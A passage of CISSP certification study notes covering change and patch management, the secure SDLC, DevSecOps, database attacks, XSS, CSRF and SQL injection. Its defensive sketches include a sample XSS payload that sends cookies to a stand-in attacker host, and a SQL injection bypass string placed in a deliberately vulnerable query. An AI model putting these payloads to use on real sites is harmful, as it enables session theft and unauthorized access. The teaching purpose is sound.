2. Pattern Matching — — — — → MOST EFFECTIVE (a small sketch follows this list)
3. Labelling — — — — — — — — -> FASTEST
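A minimal sketch of DLP pattern matching, using a simplified regular expression for payment-card-like numbers (the pattern and messages are invented and far cruder than a production rule):

# Simplified DLP pattern-matching rule: flag outbound text containing card-like numbers.
import re

CARD_PATTERN = re.compile(r"\b(?:\d[ -]?){15}\d\b")   # 16 digits with optional separators

def dlp_scan(message):
    return "BLOCK" if CARD_PATTERN.search(message) else "ALLOW"

print(dlp_scan("Invoice attached, thanks."))                          # ALLOW
print(dlp_scan("My card is 4111 1111 1111 1111, please charge it"))   # BLOCK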

CONFIGURATION MANAGEMENT
a) Process for establishing a baseline of the IT environment
b) Provides uniformity
c) CCM (Configuration and Change Management) is a continuous process of control
d) The purpose of CCM is to establish a process that ensures the integrity of assets

Configuration Management is the process of maintaining systems, such as


computer hardware and software, in a desired state. Configuration Management
(CM) is also a method of ensuring that systems perform in a manner consistent
with expectations over time
CCB (Change Control Board) — — -→Handles changes within projects

CAB (Change Advisory Board) →Handles Emergency & Business impact


changes

CHANGE MANAGEMENT PROCESS (DIRECTIVE


CONTROL)
Change management is a systematic approach to dealing with the transition or
transformation of an organization’s goals, processes or technologies. The purpose
of change management is to implement strategies for effecting change, controlling
change and helping people to adapt to change
PATCH MANAGEMENT PROCESS (CORRECTIVE
CONTROL)
Patch management is the process of applying updates to software, drivers, and
firmware to protect against vulnerabilities. Effective patch management also helps
ensure the best operating performance of systems, boosting productivity.
Patching Challenges

[Link]
2. Poorly crafted patches
3. Required downtime
4. Added expense
5. Virtualization — Specific concern
6. Timing

INCIDENT RESPONSE (CORRECTIVE CONTROL)


Incident response (IR) is the process by which an organization handles a data
breach or cyberattack. It is an effort to quickly identify an attack, minimize its
effects, contain damage, and remediate the cause to reduce the risk of future
incidents.
THREAT INTELLIGENCE
The threat intelligence lifecycle is a methodical framework that aids in the
efficient management and application of threat intelligence by organizations. It
makes sure that information about potential threats is handled with care and
offers organizations a set of guidelines they may use to stay informed about risks
and take precautions against them. Organizations may gather information on
risks with confidence thanks to this security intelligence lifecycle, evaluate it for
accuracy and dependability, and take protective measures as a result.

By following this process, intelligence teams can build an efficient threat


intelligence process.

The six steps in the intelligence lifecycle include:

1. Planning
2. Collection
3. Processing
4. Analysis and Production
5. Dissemination
6. Feedback and improvement
PROBLEM MANAGEMENT vs INCIDENT MANAGEMENT

Problem management is a practice focused on preventing incidents or


reducing their impact.

Incident management is focused on addressing incidents in real time.

IMPLEMENT RECOVERY STRATEGIES


BACKUP TYPES
RAID
BACKUP AND RECOVERY SYSTEM
DISASTER RECOVERY
BCP/DR TESTING STRATEGIES
PHYSICAL SECURITY
Physical security is the protection of personnel, hardware, software, networks and
data from physical actions and events that could cause serious loss or damage to
an enterprise, agency or institution. This includes protection from fire, flood,
natural disasters, burglary, theft, vandalism and terrorism.
CARD TYPES and CCTV

CCTV (closed-circuit television) is a TV system in which signals are not publicly


distributed but are monitored, primarily for surveillance and security purposes.
CCTV relies on strategic placement of cameras and private observation of the
camera’s input on monitors.
DOOR LOCKS
CISSP: Domain 8 — Software Development
Security: Easy Notes to Pass CISSP
Certification in 2023–24
[Link]

DOMAIN OBJECTIVES
UNDERSTAND AND INTEGRATE SECURITY IN SDLC
IDENTIFY AND APPLY SECURITY CONTROLS IN SOFTWARE
DEVELOPMENT ECOSYSTEMS
ASSESS THE EFFECTIVENESS OF SOFTWARE SECURITY
ASSESS SECURITY IMPACT OF ACQUIRED SOFTWARE
DEFINE AND APPLY SECURE CODING GUIDELINES AND STANDARDS
IMPLEMENT AUTHENTICATION SYSTEMS
SDLC vs SLC
SDLC (Software Development Life Cycle) and SLC (Systems Life Cycle) are both
methodologies used in the field of software and systems engineering to manage
the development and maintenance of software and systems. While they share
some similarities, they have distinct focuses and purposes.
SDLC (Software Development Life Cycle):
SDLC is a structured framework for developing software applications. It
encompasses all the phases involved in the development process, from initial
planning and requirements gathering to coding, testing, deployment, and
maintenance. The primary goal of SDLC is to produce high-quality software that
meets user requirements, is delivered on time, and is within budget. Some
common SDLC models include the Waterfall model, Agile methodologies (Scrum,
Kanban), and the V-Model, among others.
SLC (Systems Life Cycle):
SLC, on the other hand, is a broader framework that focuses on the entire lifecycle
of a computer-based system, which may include hardware, software, processes,
and people. It encompasses the planning, design, implementation, operation, and
maintenance phases of a system. While SLC includes software development, it
also considers the overall system architecture, infrastructure, and how the system
aligns with an organization’s goals and processes. SLC is often used in contexts
where the scope extends beyond just software, such as the development of
complex information systems.

1. PROJECT INITIATION AND PLANNING SECURITY ACTIVITIES


▪ Business need
▪ Meeting to understand project requirement
▪ Meeting to understand stakeholder project
▪ Meeting to understand Security consideration
▪ Understand and document requirement
▪ Understand Cost and Regulatory requirement
▪ Resource requirement
2. FUNCTIONAL REQUIREMENT DEFINITION
▪ Document functionality requirement
▪ Functionality will be defined
▪ Security requirement will be formalized
▪ Team also reviews documents from project initiation phase and makes any
revision/updates
▪ Key activities to audit include reviews like privacy impact assessment and data
classification
▪ Ensuring complete requirement and document understanding is critical to
design and build a system with adequate protection mechanism
3. DETAILED DESIGN SPECIFICATION SECURITY ACTIVITIES
(Threat modelling in this phase)
▪ System Architecture, System Output and System interface are designed
▪ Data input, Data flow, and Output requirement are established
▪ Prepared detailed design and update testing goal and plan
▪ Evaluate against requirement such as Cloud vs OnPrem
▪ Formal risk assessment and decision process utilized to determine which of the
proposed solution alternatively adequately meets stated requirements and formal
acceptance.
▪ Formal acceptance and residual risks
4. DEVELOPMENT AND DOCUMENT SECURITY ACTIVITIES
▪ Source code generation
▪ Test scenarios and test case developed
▪ Unit and Integration tests conducted
▪ General care of software quality, reliability, and consistency of operation
▪ Code analyzed to eliminate common vulnerabilities
5. TESTING AND EVALUATION CONTROLS (ACCEPTANCE PHASE)
Test Data should include following
▪ Data at the ends of the acceptable data range
▪ Various points in between
▪ Data beyond expected / allowed data points
Test with
▪ Known good data
▪ Never with live production data
▪ Sanitized data (Use static masking)
Data Validation
▪ Before and after each test, review the data to ensure that the data has not been
modified.
Bound Checking
▪ To prevent buffer overflows
6. CERTIFICATION AND ACCREDITATION
Certification (Technical Validation of Product)
▪ Evaluating the security stance of software
▪ Examine how well system performs its functional requirement
Accreditation (Management Acceptance)
▪ After reviewing the certification, authorize software / system to be implemented
in production.
7. TRANSITION INTO PRODUCTION
▪ Obtaining Accreditation
▪ New system transitioned from Acceptance phase to live Prod environment
▪ Training new user according to implementation
▪ Implementing the system
▪ Including installation and data conversion
8. OPERATION AND MAINTENANCE SUPPORT
▪ Monitor the performance of system
▪ Ensure continuity of operation
▪ Detect defects and weakness
▪ Manage and prevent system problems
▪ Recover from system problems
▪ Implement system changes
▪ Subject to external audit
9. REVISION AND SYSTEM REPLACEMENT (DISPOSAL)
▪ Periodic evaluations and audits
▪ Changes must follow SDLC and be recorded
NIST System Development Life Cycle (SDLC)
The NIST System Development Life Cycle (SDLC) typically comprises five phases,
each serving a distinct purpose:
1. Initiation: Identifying the need for the system and defining project
objectives.
2. Development and Acquisition: Creating or acquiring the system
components.
3. Implementation and Integration: Deploying and integrating the
system into the environment.
4. Operations and Maintenance: Supporting and maintaining the
system in its operational state.
5. Disposition: Safely retiring or replacing the system when it’s no longer
needed.
DEV OPS
DevOps is a set of practices and cultural philosophies that aim to improve and
streamline the collaboration between software development (Dev) and IT
operations (Ops) teams. The primary goal of DevOps is to shorten the software
development lifecycle, increase the frequency of software releases, and enhance
the quality and reliability of software products. It encourages a shift from
traditional siloed and sequential development and deployment processes to a
more integrated and automated approach.

Here are the phases of DevOps summarized in one line each:


1. Plan: Define project goals and requirements, and establish a
development and deployment roadmap.
2. Code: Write and review code to implement software features and
functionalities.
3. Build: Compile, package, and create deployable artifacts from the
codebase.
4. Test: Automated testing is performed to identify and rectify defects.
5. Deploy: Automated deployment of code and configurations to various
environments.
6. Operate: Manage and monitor applications and infrastructure in
production.
7. Monitor: Continuously track application performance and
infrastructure health.
8. Feedback and Optimization: Use feedback to make improvements in
development, deployment, and operations processes.
DEVSECOPS
DevSecOps is an extension of DevOps that incorporates security practices into the
entire software development and delivery lifecycle. It aims to integrate security
considerations and actions at every phase of the development process, from
planning and coding to testing, deployment, and monitoring. The primary goals of
DevSecOps are to proactively identify and address security vulnerabilities and to
ensure that security is not a separate or neglected aspect of software development
but an integral part of it.
Key principles and practices of DevSecOps include:
1. Security as Code: Treat security policies and controls as code for
automation and version control.
2. Shift-Left Security: Integrate security early in the development
process, from coding to testing.
3. Continuous Security Testing: Automate security testing throughout
the CI/CD pipeline.
4. Vulnerability Scanning: Identify and remediate security
vulnerabilities in dependencies.
5. Compliance as Code: Automate compliance checks to meet regulatory
requirements.
6. Security Training and Awareness: Educate teams on security to
foster a security-conscious culture.
7. Incident Response Automation: Automate responses to security
incidents for rapid mitigation.
8. Collaboration: Promote collaboration between development,
operations, and security teams.
DevSecOps promotes a “security-first” mindset, where security is not seen as a
hindrance to development speed but as an essential component for building and
delivering secure software. This approach helps organizations identify and
remediate security issues early in the development process, reducing the risk of
security breaches and the cost of addressing vulnerabilities after deployment.
COTS (COMMERCIAL OFF THE SHELF SOFTWARE)
COTS, which stands for “Commercial Off-The-Shelf Software,” refers to
prepackaged software products that are commercially available and ready for
purchase and use by organizations or individuals without the need for custom
development. These software products are developed by third-party vendors and
are typically designed to address common business needs or provide specific
functionalities.
Key characteristics of COTS software include:
1. Commercially Available: COTS software is commercially produced
and sold by vendors for a wide range of users.
2. Generalized Functionality: It provides prebuilt, standardized
functionalities designed to meet common business needs.
3. Limited Customization: COTS software allows only limited
customization and configuration, compared to bespoke solutions.
4. Cost and Time Savings: Adoption of COTS software reduces
development time and cost, as it eliminates the need for extensive in-
house development.
5. Vendor Support and Updates: Vendors offer support, updates, and
maintenance to ensure the software remains secure and functional.
6. Broad User Base: COTS software often has a large user community,
providing access to user experiences, best practices, and additional
resources.
ASSESS SECURITY IMPACT OF ACQUIRED SOFTWARE
SAMM (SOFTWARE ASSURANCE MATURITY MODEL)
SAMM is an open framework for software security that helps organizations assess,
formulate, and implement a strategy for improving their software security
practices. It provides a structured approach to managing and enhancing software
security by focusing on various aspects of the software development lifecycle.
The goal of SAMM is to help organizations reduce software security risks and
build more secure software products. It was developed by the Open Web
Application Security Project (OWASP).
CMMI (CAPABILITY MATURITY MODEL INTEGRATION)
It is a framework that provides a set of best practices for improving the processes
used in software development and other areas of an organization.
The primary goal of CMMI is to help organizations enhance the quality, efficiency,
and effectiveness of their processes and achieve better overall performance.
CMMI is not limited to software development but can be applied to various
domains, including systems engineering, project management, and product
development.
Five maturity levels of the CMMI
Level 1 — Initial: Processes are often chaotic and unpredictable, lacking
formalization.
Level 2 — Managed: Basic process discipline is established, leading to more
predictable project outcomes.
Level 3 — Defined: Processes are well-documented, standardized, and
consistently applied across the organization.
Level 4 — Quantitatively Managed: Organizations use quantitative data for
process management, aiming for stability and control.
Level 5 — Optimizing: A focus on continuous process improvement and
innovation to adapt to changing needs and challenges.
WATERFALL vs OTHER MODELS
WATERFALL MODEL
The waterfall project management methodology lets you plan out your project in a
linear manner where each subsequent phase initiates after the last one ends. It’s
one of the most straightforward ways to manage a project and is a good choice if
you already have clearly outlined objectives.
Sequential structure: The waterfall model divides your operations into
sequential phases. You can only move to the next stage in your project once the
current one is complete. This also means there’s no space for changing course or
revisiting a phase after its completion. The only way to go back is to start all over
again.
Minimal customer involvement: A waterfall project involves minimal
customer interaction. This is primarily due to the fact that operations only start
after the customer’s requirements and objectives are clearly defined. The first
meeting takes place before operations begin and the next when the project is in its
final stages.
Robust documentation: This methodology also involves in-detail
documentation of all requirements, the development process, and the final
outcome. This includes everything from the timeline to the precise route you will
take to solve the client’s problems. Since there’s minimal to no customer
communication during the development process, every essential detail needs to be
documented upfront.
1. Requirements Gathering: Define project needs.
2. System Design: Plan system architecture.
3. Implementation (Coding): Write software code.
4. Testing: Evaluate software functionality.
5. Integration and Deployment: Combine and deliver system.
ITERATIVE MODELS
An iterative method, often referred to as iterative development or iterative design,
is an approach to project management and software development in which a
project is divided into smaller, manageable segments called iterations.
Each iteration represents a complete cycle of planning, designing, building,
testing, and reviewing a portion of the project. The key characteristic of iterative
methods is that they allow for revisiting and refining work in subsequent
iterations based on feedback and changing requirements.
AGILE SCRUM
Agile Scrum is a framework used in software development and project
management that emphasizes collaboration, flexibility, and iterative progress to
deliver high-quality products. It is one of several approaches within the broader
Agile methodology, which is designed to address the challenges of traditional,
rigid project management methods.
DBMS (Database Management System)
It is a software application or system that is designed to manage, store, retrieve,
and manipulate data in a structured way. A DBMS provides an organized and
efficient method for users and applications to interact with databases.
SQL
SQL, or Structured Query Language, is a powerful and standardized programming
language used for managing, querying, and manipulating relational databases. It
provides a structured way to communicate with databases, enabling users to
interact with the data stored in them. Here’s an explanation of SQL’s key
components and functions:
1. Database: Relational
2. Manipulation: CRUD (Create, Read, Update, Delete)
3. Querying: Retrieval
4. Definition: Schema
5. Control: Permissions
6. Transaction: Atomicity
7. Indexing: Optimization
8. Integrity: Constraints
9. Views: Virtual Tables
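A minimal sketch of the CRUD operations listed above, using Python's built-in sqlite3 module and a throwaway in-memory database (the table and column names are illustrative):

import sqlite3

conn = sqlite3.connect(":memory:")  # throwaway in-memory database
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")  # Definition (schema)

conn.execute("INSERT INTO users (name) VALUES (?)", ("alice",))              # Create
rows = conn.execute("SELECT id, name FROM users").fetchall()                 # Read
conn.execute("UPDATE users SET name = ? WHERE name = ?", ("bob", "alice"))   # Update
conn.execute("DELETE FROM users WHERE name = ?", ("bob",))                   # Delete

conn.commit()   # Transaction: changes become durable only on commit
conn.close()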
API (APPLICATION PROGRAMMING INTERFACE)
An API, is a set of rules and protocols that allows different software applications
to communicate with each other. It defines the methods and data formats that
applications can use to request and exchange information. APIs serve as
intermediaries, enabling the integration of various software systems and allowing
them to work together seamlessly.
Here are some key points to understand about APIs:
1. Communication Bridge: APIs act as bridges between different software
components, allowing them to interact and share data or functionality.
2. Abstraction Layer: APIs provide a level of abstraction, shielding developers
from the underlying complexities of the systems they are interacting with. This
abstraction simplifies the development process.
3. Standardization: APIs define a standard way for applications to interact.
This standardization ensures consistency & compatibility between systems.
4. Types of APIs:
 Web APIs: These are APIs that are accessible over the internet using
HTTP/HTTPS protocols. Web APIs are commonly used for web services,
including RESTful and SOAP APIs.
 Library or Framework APIs: These APIs provide a set of functions
and classes that developers can use to build applications within a specific
programming language or framework.
 Operating System APIs: These APIs allow applications to interact
with the underlying operating system, accessing features like file I/O,
hardware control, and system resources.
5. API Requests and Responses: APIs involve making requests and receiving
responses. The request typically includes information such as the desired action
and any required parameters, while the response contains the requested data or
confirmation of the action.
6. Authentication and Authorization: Many APIs require authentication to
ensure that only authorized users or applications can access their resources. This is
often done using API keys, tokens, or other authentication mechanisms.
As a real-life analogy, you can think of an API as a waiter in a restaurant: the
waiter takes your order to the chef, collects the food you asked for, and brings it
back to your table.
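For a concrete feel of request and response, here is a minimal sketch of a client calling a web API over HTTPS using only the Python standard library; the endpoint URL and the X-API-Key header are hypothetical placeholders.

import json
import urllib.request

# Hypothetical endpoint and API key, used purely for illustration.
url = "https://api.example.com/v1/orders/42"
request = urllib.request.Request(url, headers={"X-API-Key": "REPLACE_ME"})

# The request names the desired action (GET this resource); the response
# carries the requested data, typically as JSON.
with urllib.request.urlopen(request, timeout=10) as response:
    order = json.loads(response.read().decode("utf-8"))
    print(order)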
METADATA
Metadata is information that provides context and attributes about other data. It
helps describe, organize, and manage data, making it more accessible and
understandable. Metadata can include details such as titles, authors, creation
dates, file formats, and data sources. It is used for data discovery, data
integration, data preservation, and ensuring data quality. Metadata standards
help ensure consistency in describing and managing data across various domains
and industries.
OLAP (Online Analytical Processing)
OLAP, or Online Analytical Processing, is a technology and approach for data
analysis that enables users to interact with and analyze data in a
multidimensional way. It’s commonly used in business intelligence and data
warehousing to gain insights from large datasets.
DATA MINING
Data mining is the process of discovering patterns, trends, insights, and
knowledge from large volumes of data. It involves the use of various techniques,
including statistical analysis, machine learning, and artificial intelligence, to
extract valuable information and uncover hidden relationships within datasets.
DB VULNERABILITIES AND THREAT ATTACK
Aggregation Attack:
An aggregation attack is a privacy violation or security breach in which an attacker
combines or aggregates information from multiple sources to deduce sensitive or
confidential data that would not be apparent from any single source. Aggregation
attacks exploit the practice of collecting and combining various pieces of
seemingly innocuous information to infer valuable or private details about
individuals, organizations, or systems.
Inference Attack:
An inference attack is a privacy breach in which an attacker deduces sensitive or
confidential information by analyzing seemingly innocuous or non-sensitive data.
Inference attacks are often used to extract private details by making educated
guesses or leveraging knowledge about the system’s behavior, access patterns, or
data relationships.
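A minimal sketch of how an inference attack can work against aggregate queries: each answer looks harmless on its own, but an average computed over a group of one reveals an individual's exact value. The records below are invented for illustration.

# Hypothetical salary records: (name, department, salary)
records = [
    ("alice", "engineering", 70000),
    ("bob", "engineering", 80000),
    ("carol", "finance", 90000),   # carol is the only finance employee
]

def avg_salary(dept):
    salaries = [s for _, d, s in records if d == dept]
    return sum(salaries) / len(salaries)

# Each aggregate answer looks non-sensitive on its own...
print(avg_salary("engineering"))   # 75000.0
# ...but an "average" over a group of one discloses an individual's salary.
print(avg_salary("finance"))       # 90000.0, so carol's exact salary is inferred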
POLYINSTANTIATION & POLYMORPHISM
Polyinstantiation:
Polyinstantiation is a security mechanism used in secure database systems to
manage situations where multiple data items with different security classifications
are stored under the same identifier or key. It allows different security levels of
information to coexist within the same database.
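A minimal sketch of the idea, assuming a toy two-level classification scheme: the same key holds a different tuple per security level, so low-cleared readers see a cover story rather than a telling gap in the data.

# Toy polyinstantiated "table": one key, one row instance per classification level.
flights = {
    "flight-101": {
        "unclassified": {"destination": "training exercise"},     # cover story
        "secret":       {"destination": "forward operating base"},
    }
}

def read_row(key, clearance):
    """Return the instance of the row appropriate to the reader's clearance."""
    row = flights[key]
    return row["secret"] if clearance == "secret" else row["unclassified"]

print(read_row("flight-101", "unclassified"))  # low-cleared user sees the cover story
print(read_row("flight-101", "secret"))        # cleared user sees the real data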
Polymorphism:
Polymorphism is a programming concept, often used in object-oriented
programming (OOP), that allows objects or functions to take on multiple forms
based on context. It enhances code reusability and flexibility by enabling objects
of different types to be treated in a unified way. Polymorphism can be achieved
through method overloading (compile-time polymorphism) and method
overriding (runtime polymorphism).
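A minimal sketch of runtime polymorphism through method overriding: two classes expose the same method name, so calling code can treat objects of different types uniformly. Only overriding is shown, since Python does not support compile-time method overloading in the Java sense.

class Shape:
    def area(self) -> float:
        raise NotImplementedError

class Square(Shape):
    def __init__(self, side: float):
        self.side = side
    def area(self) -> float:          # overrides Shape.area
        return self.side ** 2

class Circle(Shape):
    def __init__(self, radius: float):
        self.radius = radius
    def area(self) -> float:          # overrides Shape.area
        return 3.14159 * self.radius ** 2

# The same call works on objects of different types (runtime polymorphism).
for shape in (Square(2), Circle(1)):
    print(type(shape).__name__, shape.area())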
LOCK CONTROL
Lock control is a key component of the ACID (Atomicity, Consistency, Isolation,
Durability) properties in database management systems. ACID is a set of
properties that guarantee reliable and consistent transaction processing in
databases. Lock control, often referred to as concurrency control, plays a crucial
role in ensuring that multiple transactions can be executed simultaneously
without interfering with each other.
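A minimal sketch of atomicity and rollback using Python's sqlite3 module: the two balance updates commit together or not at all, so other transactions never observe a half-finished transfer. The table and amounts are illustrative.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (name TEXT PRIMARY KEY, balance INTEGER)")
conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                 [("alice", 100), ("bob", 0)])
conn.commit()

try:
    # Both updates belong to one transaction: all-or-nothing (atomicity).
    conn.execute("UPDATE accounts SET balance = balance - 50 WHERE name = 'alice'")
    conn.execute("UPDATE accounts SET balance = balance + 50 WHERE name = 'bob'")
    conn.commit()
except sqlite3.Error:
    conn.rollback()   # any failure undoes the partial work

print(conn.execute("SELECT * FROM accounts").fetchall())
conn.close()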
OLTP (Online Transaction Processing)
Online Transaction Processing (OLTP) is a type of data processing system that
focuses on managing and facilitating transaction-oriented tasks in real-time.
OLTP systems are designed to efficiently and accurately handle a high volume of
small, individual transactions, such as recording sales, processing customer
orders, and updating inventory.
SOAR (Security Orchestration, Automation & Response)
Security Orchestration, Automation, and Response (SOAR) is a comprehensive
cybersecurity technology and approach designed to improve the efficiency and
effectiveness of an organization’s security operations. SOAR platforms and
practices combine orchestration and automation to streamline incident response,
threat detection, and security operations while enabling better coordination and
collaboration among security teams.
SOURCE CODE MANAGEMENT (E.g. GitHub)
Source Code Management (SCM), also known as Version Control or Version
Control System (VCS), is a software development practice and a set of tools that
enable developers to efficiently track, manage, and collaborate on changes to the
source code of a software project.
SOFTWARE COMPOSITION ANALYSIS (SCA)
Software Composition Analysis (SCA) is a cybersecurity practice and a set of tools
used to identify and assess the components and dependencies within a software
application. The primary goal of SCA is to manage and mitigate security,
licensing, and compliance risks associated with the use of third-party or open-
source software components within a software project. SCA tools help
organizations gain a clear understanding of the software components used in their
applications, including libraries, frameworks, and other external dependencies.
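At its core, an SCA check compares a project's declared dependencies against known-vulnerable versions. A minimal sketch follows; both the dependency list and the advisory entry are invented for illustration, whereas real tools query curated vulnerability databases.

# Invented advisory data; real SCA tools pull from curated vulnerability feeds.
KNOWN_VULNERABLE = {
    ("examplelib", "1.2.0"): "CVE-XXXX-YYYY (illustrative identifier)",
}

# Declared dependencies as (name, pinned version) pairs, e.g. parsed from a manifest.
dependencies = [
    ("examplelib", "1.2.0"),
    ("otherlib", "4.1.3"),
]

for name, version in dependencies:
    advisory = KNOWN_VULNERABLE.get((name, version))
    if advisory:
        print(f"FLAGGED: {name}=={version} -> {advisory}")
    else:
        print(f"ok: {name}=={version}")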
PROTECTING SOURCE CODE
Protecting source code involves implementing security measures to safeguard the
intellectual property and sensitive information contained within the source code
of a software application. Source code is a valuable asset, and protecting it is
essential to prevent unauthorized access, disclosure, modification, or theft.
SOURCE CODE ANALYSIS TOOL
A Source Code Analysis Tool, also known as a Static Code Analysis Tool or Static
Application Security Testing (SAST) tool, is a software application or utility used
by developers, quality assurance teams, and security professionals to examine the
source code of a software application or program. The primary purpose of these
tools is to identify potential issues, vulnerabilities, coding errors, and security
flaws in the source code.
DAST and SAST
DAST (Dynamic Application Security Testing) and SAST (Static Application
Security Testing) are two different approaches to identifying and mitigating
security vulnerabilities in software applications. They operate at different stages
of the software development lifecycle and use distinct techniques.
VIRUS
A virus is a malicious program that replicates by inserting its own code into other
programs and system components. As it spreads, it can affect many parts of a
computer system, turning the machine into a compromised device. Typical effects
include:
1. Slow system performance
2. Data loss
3. System crashes
Defenses against viruses include:
a) Keep software updated regularly
b) Install an antivirus program on all devices
c) Avoid phishing emails and other social engineering tactics
TYPES OF VIRUS
R/W = Ransomware
Malware
Malware is malicious software deployed by a threat actor to wreak havoc on an
organization or individual. Malware is usually found attached to emails,
embedded in fraudulent links, hidden in ads, or lying in-wait on various sites that
you (or your employees) might visit on the internet. The end goal of malware is to
harm or exploit computers and networks, often to steal data or money.
Defenses against malware include:
a) Employing Monitoring and Detection Tools
b) Utilizing Security Awareness Training
c) Have a Vulnerability Management Program
d) Implement a Zero Trust Framework
CROSS SITE SCRIPTING
Cross-site scripting (XSS) is a type of cyber attack where an attacker injects
malicious code into a website, allowing them to steal sensitive data or take control
of the site.
XSS attacks can be performed through various means, including faulty user input
validation, unintentional JavaScript execution, and exploitation of vulnerabilities
in web applications. It is important for website administrators to implement
security measures, such as input validation and output encoding (escaping), to
protect against XSS attacks.
How does XSS work?
Cross-site scripting works by manipulating a vulnerable web site so that it returns
malicious JavaScript to users. When the malicious code executes inside a victim’s
browser, the attacker can fully compromise their interaction with the application.
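The standard defence is output encoding: untrusted input is escaped before being written into a page, so a script payload renders as inert text instead of executing. A minimal sketch using Python's built-in html module follows; modern template engines apply this escaping automatically.

import html

untrusted = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Reflecting the raw input would execute the attacker's JavaScript in the victim's browser.
unsafe_page = f"<p>Search results for: {untrusted}</p>"   # vulnerable, shown for contrast

# HTML-escaping the input turns the payload into harmless text.
safe_page = f"<p>Search results for: {html.escape(untrusted)}</p>"
print(safe_page)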
CROSS SITE REQUEST FORGERY (CSRF)
Cross-Site Request Forgery (CSRF) is a type of security vulnerability or attack that
occurs when an attacker tricks a user into unintentionally performing actions on a
website or web application without the user’s consent. CSRF attacks are often
carried out through malicious links or scripts that exploit the trust a user has with
a particular website.
Here’s a more detailed explanation of CSRF:
1. Basic Concept: In a CSRF attack, an attacker tricks a user into
executing an unwanted action on a website where the user is already
authenticated. The user might be completely unaware that the action is
taking place.
2. How It Works: The attacker crafts a malicious URL or embeds
malicious code on a website. This URL or code, when triggered, makes
the victim’s browser send a request to a different website (usually the
target website) that the user is already authenticated with. Since the
browser sends the request with the user’s credentials, the target website
mistakenly believes that the request is legitimate.
3. Example: Let’s say a user is logged into their online banking account. If
the attacker tricks them into clicking a link or image on a malicious
website, and this link sends a request to transfer money to the attacker’s
account on the banking site, the user’s browser will carry out the request
because it’s already authenticated with the banking site.
4. Security Impact: CSRF attacks can have serious consequences, as they
can lead to unauthorized actions being performed on behalf of the user.
These actions could include changing passwords, making financial
transactions, modifying data, or more, depending on the functionality
exposed by the vulnerable website.
5. Mitigation: Web developers and application owners need to implement
proper security measures to prevent CSRF attacks. This includes using
secure coding practices, validating requests, and implementing anti-CSRF
mechanisms such as per-session tokens (a minimal sketch follows this list).
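A minimal sketch of the anti-CSRF token mechanism referred to above: the server issues a random token bound to the user's session, embeds it in its own forms, and rejects any state-changing request that does not echo the token back. The session store is simplified to a dictionary for illustration.

import secrets
import hmac

# Simplified session store; a real application would use its web framework's sessions.
session = {}

def issue_csrf_token() -> str:
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token          # embedded as a hidden field in the site's own forms

def is_request_allowed(submitted_token: str) -> bool:
    expected = session.get("csrf_token", "")
    # Constant-time comparison; a request forged from another site cannot know the token.
    return hmac.compare_digest(expected, submitted_token)

form_token = issue_csrf_token()
print(is_request_allowed(form_token))        # True: legitimate form submission
print(is_request_allowed("guessed-value"))   # False: forged cross-site request rejected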
Difference Between XSS and CSRF
The key difference between XSS and CSRF is that, in XSS (Cross-Site
Scripting), the vulnerable site itself accepts and executes the attacker's
injected code, while in CSRF (Cross-Site Request Forgery), the malicious
request is launched from a third-party site and rides on the victim's
authenticated session with the target site. XSS is a vulnerability in web applications
that enables attackers to inject client-side scripts into web pages viewed by other
users. CSRF, on the other hand, tricks the victim's browser into transmitting
unauthorized commands that the web application trusts because they arrive with
the user's credentials.
Summary — XSS vs CSRF
XSS and CSRF are two types of attacks on a website. XSS stands for Cross-Site
Scripting, while CSRF stands for Cross-Site Request Forgery. In short, XSS injects
malicious script into the trusted site itself, whereas CSRF abuses the trust the site
places in the user's browser by sending forged requests from a third-party site.
SQL INJECTION
SQL injection is a security threat where an attacker injects malicious SQL code
into a web application’s database queries, allowing them to access sensitive data,
modify or delete data, or execute unauthorized actions. It occurs when user input
is not properly sanitized or validated, enabling an attacker to exploit
vulnerabilities in the application.
To protect against SQL injection, use parameterized queries, input validation, and
limit privileges to the database.
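A minimal sketch contrasting a vulnerable string-built query with a parameterized one, using Python's sqlite3 module; the login table and the classic ' OR '1'='1 payload are illustrative.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

payload = "anything' OR '1'='1"

# VULNERABLE: attacker-controlled input is concatenated into the SQL text,
# so the OR '1'='1' clause makes the check pass without valid credentials.
vulnerable = conn.execute(
    f"SELECT * FROM users WHERE username = 'alice' AND password = '{payload}'"
).fetchall()

# SAFE: parameterized query; the driver treats the payload as plain data.
safe = conn.execute(
    "SELECT * FROM users WHERE username = ? AND password = ?", ("alice", payload)
).fetchall()

print(vulnerable)  # returns the row despite the wrong password
print(safe)        # returns nothing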
CODE SIGN
Code signing is a security practice used in software development to verify the
authenticity and integrity of software or code. It involves digitally signing code or
executable files with a cryptographic signature, typically using a private key. This
signature can then be verified using the corresponding public key to ensure that
the code hasn’t been tampered with and that it comes from a trusted source.
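A minimal sketch of the sign-and-verify flow using an RSA key pair, assuming the third-party cryptography package is available. Real code signing additionally relies on certificates issued by a trusted certificate authority and on platform tooling, which this simplification omits.

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.exceptions import InvalidSignature

# Key generation; in real code signing the private key lives in an HSM or signing service.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

artifact = b"binary or package contents to be released"

# The publisher signs the artifact with the private key.
signature = private_key.sign(
    artifact,
    padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),
    hashes.SHA256(),
)

# The consumer verifies with the public key: tampering or a wrong key raises InvalidSignature.
try:
    public_key.verify(
        signature,
        artifact,
        padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),
        hashes.SHA256(),
    )
    print("signature valid: artifact is authentic and unmodified")
except InvalidSignature:
    print("signature INVALID: do not trust this artifact")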
SANDBOX
A sandbox is a secure testing environment used to develop and test software,
websites, or applications without affecting the main production environment. It
allows developers to experiment, test new ideas, and work on projects without
risking any data breaches or system failures. Sandboxes are often used in software
development, QA testing, and web development.
Key characteristics of a sandbox include:
1. Isolation: Sandboxes keep untrusted code separate from the rest of the
system to prevent interference and damage.
2. Security: They create a safe environment for running unverified code,
enhancing system security.
3. Control: Sandboxes are governed by rules and policies dictating
resource access and actions.
4. Testing and Analysis: Developers use them to assess software for
